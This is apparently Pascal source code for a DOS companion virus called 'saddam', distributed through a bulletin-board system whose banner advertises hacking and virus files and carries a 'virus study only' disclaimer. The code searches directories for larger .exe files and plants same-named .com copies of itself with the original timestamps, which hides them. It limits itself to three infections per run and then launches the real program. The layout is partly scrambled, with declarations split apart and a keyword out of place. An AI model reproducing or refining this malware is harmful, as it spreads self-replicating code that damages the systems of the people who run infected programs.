program saddam; {$m 10000,0,0} uses dos; var driveid buffer target,source infected done targetfile
: : : : : :
string [2]; array [1..8000] of byte; file; byte; word; string;
(*?????????????????????????????????????????????????????????????????????????*) function existcom : boolean; var findcom : searchrec; begin findfirst ( targetfile, 39, findcom ); existcom := doserror = 0; end; (*?????????????????????????????????????????????????????????????????????????*) procedure searchdir ( dir2search : string ); var s : searchrec; begin if dir2search [ length ( dir2search ) ] <> '\' then dir2search := dir2search + '\';
findfirst ( dir2search + '*.exe', 39, s ); while doserror = 0 do begin targetfile := copy ( dir2search + s.name,1, length ( dir2search + s.name ) -3 ) + 'com'; if ( copy ( s.name, length ( s.name ) -2,3 ) = 'exe' ) and not existcom and ( infected < 3 ) and ( s.size > 25000 ) then begin {$i-} inc ( infected ); assign ( target, targetfile ); rewrite ( target,1 ); blockwrite ( target, buffer, done + random ( 4400 )); setftime ( target, s.time ); close ( target ); if ioresult = 101 then begin
infected := 3; erase ( target ); end; {$i+} end; findnext ( s ); end; findfirst ( dir2search + '*', directory, s ); if s.name = '.' then begin findnext ( s ); findnext ( s ); end; if ( doserror = 0 ) and ( s.attr and 16 <> 16 ) then findnext ( s ); while doserror = 0 do begin if ( s.attr and 16 = 16 ) and ( infected < 3 ) searchdir ( dir2search + s.name ); findnext ( s ); end; end;
then
(*?????????????????????????????????????????????????????????????????????????*) begin driveid := fexpand ( paramstr ( 1 )); infected := 0; assign ( source, paramstr ( 0 ) ); reset ( source, 1 ); blockread ( source, buffer, 5000, done ); close ( source ); randomize; searchdir ( driveid ); exec ( copy ( paramstr ( 0 ),1, length ( paramstr ( 0 )) -3 ) + 'exe', paramstr ( 1 ) ); end. ;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=; ; -=] p e r f e c t c r i m e [=;
; -=] +31.(o)79.426o79 [=; ; -=] [=; ; -=] for all your h/p/a/v files [=; ; -=] sysop: peter venkman [=; ; -=] [=; ; -=] +31.(o)79.426o79 [=; ; -=] p e r f e c t c r i m e [=; ; -=][][][][][][][][][][][][][][][=; ; ; ; *** not for general distribution *** ; ; ; ; this file is for the purpose of virus study only! it should not be passed ; ; around among the general public. it will be very useful for learning how ; ; viruses work and propagate. but anybody with access to an assembler can ; ; turn it into a working virus and anybody with a bit of assembly coding ; ; experience can turn it into a far more malevolent program than it already ; ; is. keep this code in responsible hands! ; ; ; ;****************************************************************************;